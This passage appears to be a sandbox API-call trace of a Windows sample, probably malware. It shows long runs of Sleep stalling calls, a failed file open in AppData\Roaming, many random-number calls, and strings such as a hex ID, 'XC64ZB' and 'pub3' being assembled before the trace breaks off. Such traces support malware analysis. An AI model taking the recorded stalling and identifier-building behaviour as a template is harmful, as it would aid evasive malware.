(dwMilliseconds=0x258) [0205.152] Sleep (dwMilliseconds=0x258) [0205.222] Sleep (dwMilliseconds=0x258) [0205.263] Sleep (dwMilliseconds=0x258) [0205.358] Sleep (dwMilliseconds=0x258) [0205.479] Sleep (dwMilliseconds=0x258) [0205.608] Sleep (dwMilliseconds=0x258) [0205.714] Sleep (dwMilliseconds=0x258) [0205.811] Sleep (dwMilliseconds=0x258) [0205.870] Sleep (dwMilliseconds=0x258) [0205.920] Sleep (dwMilliseconds=0x258) [0206.026] Sleep (dwMilliseconds=0x258) [0206.123] Sleep (dwMilliseconds=0x258) [0206.181] Sleep (dwMilliseconds=0x258) [0206.229] Sleep (dwMilliseconds=0x258) [0206.327] Sleep (dwMilliseconds=0x258) [0206.404] Sleep (dwMilliseconds=0x258) [0206.458] Sleep (dwMilliseconds=0x258) [0206.526] Sleep (dwMilliseconds=0x258) [0206.552] Sleep (dwMilliseconds=0x258) [0206.630] Sleep (dwMilliseconds=0x258) [0206.720] Sleep (dwMilliseconds=0x258) [0207.153] Sleep (dwMilliseconds=0x258) [0207.342] Sleep (dwMilliseconds=0x258) [0207.481] Sleep (dwMilliseconds=0x258) [0207.621] Sleep (dwMilliseconds=0x258) [0207.746] Sleep (dwMilliseconds=0x258) [0207.968] Sleep (dwMilliseconds=0x258) [0207.989] Sleep (dwMilliseconds=0x258) [0208.074] Sleep (dwMilliseconds=0x258) [0208.292] Sleep (dwMilliseconds=0x258) [0208.397] Sleep (dwMilliseconds=0x258) [0208.452] Sleep (dwMilliseconds=0x258) [0208.561] Sleep (dwMilliseconds=0x258) [0208.654] Sleep (dwMilliseconds=0x258) [0208.717] Sleep (dwMilliseconds=0x258) [0208.745] Sleep (dwMilliseconds=0x258) [0208.796] Sleep (dwMilliseconds=0x258) [0208.828] Sleep (dwMilliseconds=0x258) [0208.870] Sleep (dwMilliseconds=0x258) [0208.980] Sleep (dwMilliseconds=0x258) [0209.075] Sleep (dwMilliseconds=0x258) [0209.169] Sleep (dwMilliseconds=0x258) [0209.244] Sleep (dwMilliseconds=0x258) [0209.263] Sleep (dwMilliseconds=0x258) [0209.310] Sleep (dwMilliseconds=0x258) [0209.356] Sleep (dwMilliseconds=0x258) [0209.441] Sleep (dwMilliseconds=0x258) [0209.482] Sleep (dwMilliseconds=0x258) [0209.733] Sleep (dwMilliseconds=0x258) [0209.810] Sleep (dwMilliseconds=0x258) [0209.862] Sleep (dwMilliseconds=0x258) [0209.904] Sleep (dwMilliseconds=0x258) [0209.932] Sleep (dwMilliseconds=0x258) [0209.948] Sleep (dwMilliseconds=0x258) [0210.058] Sleep (dwMilliseconds=0x258) [0210.123] Sleep (dwMilliseconds=0x258) [0210.199] Sleep (dwMilliseconds=0x258) [0210.295] Sleep (dwMilliseconds=0x258) [0210.388] Sleep (dwMilliseconds=0x258) [0210.448] Sleep (dwMilliseconds=0x258) [0210.514] Sleep (dwMilliseconds=0x258) [0210.608] Sleep (dwMilliseconds=0x258) [0210.654] Sleep (dwMilliseconds=0x258) [0210.714] Sleep (dwMilliseconds=0x258) [0210.802] Sleep (dwMilliseconds=0x258) [0210.857] Sleep (dwMilliseconds=0x258) [0210.873] Sleep (dwMilliseconds=0x258) [0210.888] Sleep (dwMilliseconds=0x258) [0210.928] Sleep (dwMilliseconds=0x258) [0210.997] Sleep (dwMilliseconds=0x258) [0211.038] Sleep (dwMilliseconds=0x258) [0211.080] Sleep (dwMilliseconds=0x258) [0211.155] Sleep (dwMilliseconds=0x258) [0211.248] Sleep (dwMilliseconds=0x258) [0211.296] Sleep (dwMilliseconds=0x258) [0211.397] Sleep (dwMilliseconds=0x258) [0211.437] Sleep (dwMilliseconds=0x258) [0211.491] Sleep (dwMilliseconds=0x258) [0211.542] Sleep (dwMilliseconds=0x258) [0211.603] Sleep (dwMilliseconds=0x258) [0211.667] Sleep (dwMilliseconds=0x258) [0211.714] Sleep (dwMilliseconds=0x258) [0211.796] Sleep (dwMilliseconds=0x258) [0211.886] Sleep (dwMilliseconds=0x258) [0212.026] Sleep (dwMilliseconds=0x258) [0212.066] Sleep (dwMilliseconds=0x258) [0212.104] Sleep (dwMilliseconds=0x258) [0212.129] Sleep (dwMilliseconds=0x258) [0212.136] Sleep (dwMilliseconds=0x258) [0212.190] Sleep (dwMilliseconds=0x258) [0212.267] Sleep (dwMilliseconds=0x258) [0212.317] Sleep (dwMilliseconds=0x258) [0212.376] Sleep (dwMilliseconds=0x258) [0212.413] Sleep (dwMilliseconds=0x258) [0212.431] Sleep (dwMilliseconds=0x258) [0212.493] Sleep (dwMilliseconds=0x258) [0212.524] Sleep (dwMilliseconds=0x258) [0212.567] Sleep (dwMilliseconds=0x258) [0212.584] Sleep (dwMilliseconds=0x258) [0212.593] Sleep (dwMilliseconds=0x258) [0212.628] Sleep (dwMilliseconds=0x258) [0212.674] Sleep (dwMilliseconds=0x258) [0212.733] Sleep (dwMilliseconds=0x258) [0212.777] Sleep (dwMilliseconds=0x258) [0212.874] Sleep (dwMilliseconds=0x258) [0212.946] Sleep (dwMilliseconds=0x258) [0212.994] Sleep (dwMilliseconds=0x258) [0213.061] Sleep (dwMilliseconds=0x258) [0213.152] Sleep (dwMilliseconds=0x258) [0213.198] Sleep (dwMilliseconds=0x258) [0213.284] Sleep (dwMilliseconds=0x258) [0213.315] Sleep (dwMilliseconds=0x258) [0213.323] Sleep (dwMilliseconds=0x258) [0213.378] Sleep (dwMilliseconds=0x258) [0213.415] Sleep (dwMilliseconds=0x258) [0213.458] Sleep (dwMilliseconds=0x258) [0213.562] Sleep (dwMilliseconds=0x258) [0213.669] Sleep (dwMilliseconds=0x258) [0213.734] Sleep (dwMilliseconds=0x258) [0213.793] Sleep (dwMilliseconds=0x258) [0213.834] Sleep (dwMilliseconds=0x258) [0213.838] Sleep (dwMilliseconds=0x258) [0213.954] Sleep (dwMilliseconds=0x258) [0214.027] Sleep (dwMilliseconds=0x258) [0214.110] Sleep (dwMilliseconds=0x258) [0214.201] Sleep (dwMilliseconds=0x258) [0214.393] Sleep (dwMilliseconds=0x258) [0214.481] Sleep (dwMilliseconds=0x258) [0214.575] Sleep (dwMilliseconds=0x258) [0214.684] Sleep (dwMilliseconds=0x258) [0214.802] Sleep (dwMilliseconds=0x258) [0214.927] Sleep (dwMilliseconds=0x258) [0215.013] Sleep (dwMilliseconds=0x258) [0215.074] Sleep (dwMilliseconds=0x258) [0215.133] Sleep (dwMilliseconds=0x258) [0215.154] Sleep (dwMilliseconds=0x258) [0215.170] Sleep (dwMilliseconds=0x258) [0215.201] Sleep (dwMilliseconds=0x258) [0215.249] Sleep (dwMilliseconds=0x258) [0215.324] Sleep (dwMilliseconds=0x258) [0215.374] Sleep (dwMilliseconds=0x258) [0215.432] Sleep (dwMilliseconds=0x258) [0215.609] Sleep (dwMilliseconds=0x258) [0215.698] Sleep (dwMilliseconds=0x258) [0215.795] Sleep (dwMilliseconds=0x258) [0215.888] Sleep (dwMilliseconds=0x258) [0215.907] Sleep (dwMilliseconds=0x258) [0215.968] Sleep (dwMilliseconds=0x258) [0216.072] Sleep (dwMilliseconds=0x258) [0216.136] Sleep (dwMilliseconds=0x258) [0216.281] Sleep (dwMilliseconds=0x258) [0216.397] Sleep (dwMilliseconds=0x258) [0216.464] Sleep (dwMilliseconds=0x258) [0216.523] Sleep (dwMilliseconds=0x258) [0216.559] Sleep (dwMilliseconds=0x258) [0216.622] Sleep (dwMilliseconds=0x258) [0216.874] Sleep (dwMilliseconds=0x258) [0216.996] Sleep (dwMilliseconds=0x258) [0217.108] Sleep (dwMilliseconds=0x258) [0217.193] Sleep (dwMilliseconds=0x258) [0217.202] Sleep (dwMilliseconds=0x258) [0217.214] Sleep (dwMilliseconds=0x258) [0217.247] Sleep (dwMilliseconds=0x258) [0217.290] Sleep (dwMilliseconds=0x258) [0217.292] Sleep (dwMilliseconds=0x258) [0217.387] Sleep (dwMilliseconds=0x258) [0217.449] Sleep (dwMilliseconds=0x258) [0217.511] Sleep (dwMilliseconds=0x258) [0217.605] Sleep (dwMilliseconds=0x258) [0217.677] Sleep (dwMilliseconds=0x258) [0217.736] Sleep (dwMilliseconds=0x258) [0217.779] Sleep (dwMilliseconds=0x258) [0217.843] Sleep (dwMilliseconds=0x258) [0217.952] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x24) returned 0x4a31840 [0217.952] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wvhwbfa" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\wvhwbfa"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0217.952] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xbb94808e [0217.952] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0xd2) returned 0x4a31890 [0217.953] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf1c7073b [0217.953] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x659c2c1c [0217.953] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x912e6753 [0217.953] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xd22213ea [0217.953] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x8767cbb7 [0217.953] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xc1891435 [0217.953] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xe69332b9 [0217.953] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x7a7d58b [0217.953] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x12812b83 [0217.953] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x60fd4952 [0217.953] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x50c59695 [0217.953] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x8355836 [0217.953] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x4cb7c23e [0217.953] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xa1c7d7ae [0217.953] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xfee1e701 [0217.953] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x56e1e6ec [0217.953] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x9f0b436e [0217.953] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x21b34286 [0217.953] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf7bc064d [0217.953] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xa120916 [0217.953] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x64541c54 [0217.953] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x8c46c334 [0217.953] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xfd2cd574 [0217.953] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xda33201e [0217.953] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x4c3dba81 [0217.953] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x62d94861 [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xecc42c8d [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x963c9012 [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x4d15bb9e [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x94326118 [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xeebee625 [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xea38bdab [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x3ac30467 [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x56c9f7a9 [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xee83ac90 [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6c712f19 [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x379b0c13 [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xbb033474 [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x689b008d [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xee0203ee [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf21f7ef5 [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x5f402668 [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x586cdbcc [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x4f98b91d [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xd88bb0c9 [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x4e235210 [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x405497a4 [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x441fbe6b [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xa27aa75c [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xe13c8f14 [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x31e4714c [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x40b84fd6 [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x613baa77 [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x15edcb8e [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x3df2e2a4 [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x56a83d45 [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x54a8f039 [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x3364314f [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6e1b0d49 [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x96431cf5 [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x3faa659c [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x9d159919 [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x4b2bc026 [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xb4380fac [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x4f5ce737 [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x28ff5409 [0217.954] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x708473a9 [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x1892438e [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x38985a3d [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x96e26c99 [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x9820972b [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x3ecf1e66 [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x62bd3b4d [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf5fe5801 [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x16ab17cb [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xdeafeba0 [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x7b7fda84 [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xa7b65339 [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x37a1c33d [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x704a237 [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xb1aa09c2 [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x4dad720e [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x8762cf19 [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x68edbaef [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x15c59088 [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x81f7072e [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x91a85ffd [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x9590ebdf [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xd65b68c0 [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xdc63f2b [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf015569b [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x9ed81a00 [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x71ef42b1 [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xcb586864 [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xdafd135c [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xdd4cac71 [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x886f53b8 [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x21c180a6 [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xb3c3de1f [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x880a58f6 [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x21181562 [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x13f8c6bf [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x92155c42 [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x407d0add [0217.955] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x2ecdcd9a [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x203245be [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x9b9f629b [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xcab63706 [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xa44e1f00 [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x5377d544 [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x31ebc1bf [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xcd6042c4 [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf62c596c [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x583d1923 [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x4ab6b9e9 [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xe1726ced [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x79e4f99d [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xae7e1f90 [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x8b214e6b [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x591646a0 [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xed739502 [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x38d41dd2 [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xb8be6a12 [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x22fa1aff [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xb519fb68 [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xc36dc4a6 [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x1ff4fc83 [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xa516a014 [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x27135b46 [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x596b0f57 [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xb8cc0d66 [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xcec28554 [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xececaf01 [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x8f9eb752 [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x7368d726 [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x276617a [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xd7e6cf03 [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xd6a53c9d [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xd4740f27 [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x647f9943 [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xe86690f2 [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x8ba3541b [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xfc35599b [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x897dacc4 [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x9b4f7512 [0217.956] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xd2030196 [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6d94c357 [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xc454d0aa [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x84a30507 [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x220b95e9 [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x92f9a64f [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x824badba [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x1b301fdf [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x4d14d416 [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x60599fdd [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x5de15efa [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xed03574d [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x59ddb636 [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xa1bc12c [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf692608f [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x38660c3b [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xa030e2ba [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x5c1e8b0 [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x208f295 [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xe503a359 [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x1b369fd7 [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf1793e2 [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6fee52a9 [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x7ac97d5d [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x36b0811e [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xdab7eb9b [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xeb7a4f78 [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xc03de679 [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x260ac52d [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x3bce11ee [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xe108015f [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x63ac61dd [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6eed71a7 [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xc8a7d9bd [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xae454b30 [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x5f1a0191 [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x2e079c2c [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x8520ce8b [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x3ef3c59d [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xd59373c5 [0217.957] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x78f3efc1 [0217.958] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x33191b58 [0217.958] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xb3665dc7 [0217.958] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x2c120887 [0217.958] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xd1d45c7a [0217.958] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x1f5914b3 [0217.958] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x33dd2ac5 [0217.958] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x5442dee7 [0217.958] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x4881197c [0217.958] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x81866247 [0217.958] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x1b990a55 [0217.958] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x9876deca [0217.958] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x46c533a5 [0217.958] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xfee0acd5 [0217.958] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xbabe52e9 [0217.958] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xfac06f57 [0217.958] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x121) returned 0x4a31970 [0217.958] lstrcatA (in: lpString1="", lpString2="FE7F15060B875FB9FB2A49F08D5D03120C287F38" | out: lpString1="FE7F15060B875FB9FB2A49F08D5D03120C287F38") returned="FE7F15060B875FB9FB2A49F08D5D03120C287F38" [0217.958] lstrcatA (in: lpString1="", lpString2="XC64ZB" | out: lpString1="XC64ZB") returned="XC64ZB" [0217.958] lstrcatA (in: lpString1="", lpString2="pub3" | out: lpString1="pub3") returned="pub3" [0217.958] lstrcatA (in: lpString1="", 